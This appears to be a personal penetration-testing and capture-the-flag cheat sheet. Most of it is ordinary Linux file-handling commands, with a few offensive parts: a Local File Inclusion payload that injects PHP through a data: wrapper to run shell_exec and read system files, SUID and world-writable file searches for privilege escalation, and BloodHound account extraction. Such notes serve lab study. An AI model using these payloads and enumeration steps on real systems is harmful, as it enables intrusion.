Files analysis
checksec --file myfile
file myfile
binwalk -e myfile
foremost myfile
tree output/
strings -n 10 myfile
hexedit myfile
Local File Inclusion
Using PHP Wrappers
http://10.11.0.22/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>
http://10.11.0.22/menu.php?file=c:\windows\system32\drivers\etc\hosts
Write files
# File creation
echo "line1
line2
line3" >> myfile
# How many lines?
wc -l myfile
3 myfile
$ cat myfile
line1
line2
line3
cat >text<<EOF
hey
yo
EOF
cat text
hey
yo
Show line
sed -n '2271p' test1
Read file
cat etc.txt
awk '{print}' etc.txt
read files in a dir
cat directory/*.txt|less
See a line that contains
awk '/michele/' test1
grep -rni 'michele' test1 -C3
find all non ascii characters
grep -naxv '.*' file.txt
File clean up
Remove duplicate lines
awk '!seen[$0]++' file
lowercase everything
sed 's/.*/\L&/g' file.txt > fileNew.txt
remove duplicates
sort -u pass.txt >> clean_pass.txt
remove space
grep --text -v '^[[:space:]]*$' clean_pass.txt > pass.txt
Remove less than 7 characters words
egrep -xv '.{1,7}' pass.txt
Retrive the last column
echo "Open 192.168.152.119:21" | cut -d ":" -f2 | sed ':a;N;$!ba;s/\n/,/g'
Compare files
➜ echo "A" > file1.txt
➜ echo "B" >> file1.txt
➜ echo "C" >> file1.txt
➜ echo "B" > file2.txt
➜ comm file1.txt file2.txt
A
B
C
➜ comm -12 file1.txt file2.txt
B
diff -c file1.txt file2.txt
*** file1.txt 2021-09-26 18:04:36.000000000 +0100
--- file2.txt 2021-09-26 18:04:44.000000000 +0100
***************
*** 1,3 ****
- A
B
- C
--- 1 ----
vimdiff file1.txt file2.txt
The -1 excludes lines that are only in a.txt, and the -3 excludes lines that are in both. Thus only the lines exclusively in b.txt are output (see man comm or comm –help for details). The output is redirected to c.txt
comm -1 -3 a.txt b.txt > c.txt
If you want the difference between the two files, use diff rather than comm. e.g.
diff -u a.txt b.txt > c.txt
Find files
Find flags
find / '(' -name 'user.txt' -or -name 'root.txt' ')' -exec wc -c {} \; -exec cat {} \; 2>/dev/null
Find suid / guid file
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
find / -type f -perm -4000 2>/dev/null
Find an file with an IP
find / -type f -exec grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" {} \+ 2>/dev/null
Find files owned by the user or writable by anybody
find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | grep -v '/proc/' | grep -v $HOME | sort | uniq
Find files writable by any group of the user
for g in `groups`; do find \( -type f -or -type d \) -group $g -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -v $HOME; done
Find root owned files in /home folders
find /home -user root 2>/dev/null
Files owned by other users in folders owned by me
for d in find /var /etc /home /root /tmp /usr /opt /boot /sys -type d -user $(whoami) 2>/dev/null; do find $d ! -user `whoami` -exec ls -l {} \; 2>/dev/null; done
Files owned by root, readable by me but no world readable
find / -type f -user root ! -perm -o=r 2>/dev/null
Files owned by me or world writable
find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null
Writable files by each group I belong to
for g in `groups`;
do printf " Group $g:\n";
find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null
done
done
Run command on output
find ~/Downloads -type f -name 'file*' -print0 | xargs -0 ls -ail
Retrieve info in a file
head flag.txt; wc flag.txt
find . -type f -name flag.txt -print0 2>/dev/null | xargs -0 egrep '^r[a-zA-Z0-9]*0$'
Read logs
cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn
cat access.log | grep 192.168.10.1 | grep '/admin' | sort -u
Copy files only (no dir)
find -maxdepth 1 -type f -exec echo cp {} newlocation/ \;
Find git folder
find . -name .git -type d
Locate all .git config in my current path
find . -name .git -type d -exec echo {}/config \;
Find excluding directories foo and bar
find /dir \( -name foo -prune \) -o \( -name bar -prune \) -o -name "*.sh" -print
???
$(find "$BASEDIR" -name '*.py' -exec grep -H urlopen \{\} \;)
Find by date?
find . -newermt "2016-04-16"
find /path/to/dir -newermt "Feb 07"
find /path/to/dir -newermt "yyyy-mm-dd"
Find modified files on given date
find /path/to/dir -newermt yyyy-mm-dd ! -newermt yyyy-mm-dd -ls
Print all x.pl
find /path/to/dir -newermt "yyyy-mm-dd" -print -type f -iname "*.pl"
Cat all files
find . -type f 2>/dev/null -exec cat {} \;
Find a term in a file
find /dir \( -name node_modules -prune \) -o -name "*.sh" -exec grep --color -Hn "your text to find" {} 2>/dev/null \;
Find specific term in files
grep -rni "term" . -C3
Search php file containing term
find . -name "*.php" -type f -print0 | xargs -0 grep -H "EcrmType::class"
Windows/powershell search files
Get-ChildItem -Path C:\Users\dave\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
Random
updatedb
locate '\.nse$' | xargs grep categories
Grep 'version\|smbb'
grep -B 5 open nmap.scan
# Retrieve samaccountname from Bloodhound data with Jq
cat 1234_users.json | jq '.data[].Properties | .samaccountname + ":" + .description' -r
Actions
Delete empty folder
find . -type d -empty -delete
Find unwanted junk files
find . -name 'Thumbs.db|.DS_Store|*.jpeg' -type f
find . -name '.DS_Store' -type f
Move all non music files
find . -not -name '*.mp3' -not -name '*.m4a' -not -name '*.MP3' -type f -exec mv -f '{}' /Users/DIRTYFILES/. \;
Find a text and replace content
find . -type f -name "*.txt" -print0 | xargs -0 sed -i "s/replacement//g"
#sed -i 's/Database://' Database.kdbx
Create multiple folders
mkdir -p folder/{sub1,sub2}/{sub1,sub2,sub3}
intercept stdout and log to file
cat file | tee -a log | cat > /dev/null`
Sum up all the lines of a file ```bash awk ‘{ sum += $1 } END { print sum }’ sum-me.txt`